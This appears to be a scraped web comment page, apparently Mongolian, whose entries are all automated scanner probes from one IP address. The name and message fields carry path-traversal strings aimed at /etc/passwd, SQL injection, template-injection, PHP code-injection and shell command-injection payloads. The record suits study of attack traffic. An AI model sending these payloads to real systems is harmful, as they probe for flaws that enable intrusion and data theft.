 • ${896160040+991651950} 194.163.191.42 475 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456鎈'"\(
 • /*1*/{{979281696+909046810}} 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1015017262')))>'0
 • ../../../../../../etc/passwd 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  <%- 991658453+908507294 %>
 • admin 194.163.191.42 475 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1578115549')))
 • admin 194.163.191.42 475 өдөр

  #set($c=828649494+818625036)${c}$c
 • admin 194.163.191.42 475 өдөр

  123456/**/and/**/cast(md5('1756359379')as/**/int)>0
 • admin 194.163.191.42 475 өдөр

  ${(987882404+915144067)?c}
 • admin 194.163.191.42 475 өдөр

  123456'and(select'1'from/**/cast(md5(1913348202)as/**/int))>'0
 • admin 194.163.191.42 475 өдөр

  ${966906427+992849685}
 • admin 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  '-var_dump(md5(637550963))-'
 • admin 194.163.191.42 475 өдөр

  kwzwjiiywczumqbtyigy
 • admin 194.163.191.42 475 өдөр

  extractvalue(1,concat(char(126),md5(1985123309)))
 • admin 194.163.191.42 475 өдөр

  /*1*/{{853985186+955888228}}
 • admin 194.163.191.42 475 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1971124893)))and"
 • admin 194.163.191.42 475 өдөр

  ${@var_dump(md5(232128977))};
 • admin 194.163.191.42 475 өдөр

  123456|expr 806835784 + 828753258
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1639806829)))and'
 • admin 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456
 • '-var_dump(md5(216504375))-' 194.163.191.42 475 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 475 өдөр

  123456
 • ${921483024+950699168} 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  ${995750568+968803872}
 • admin 194.163.191.42 475 өдөр

  123456
 • kwzwjiiywczumqbtyigy 194.163.191.42 475 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456 expr 828643028 + 854044829
 • ${@var_dump(md5(564160501))}; 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456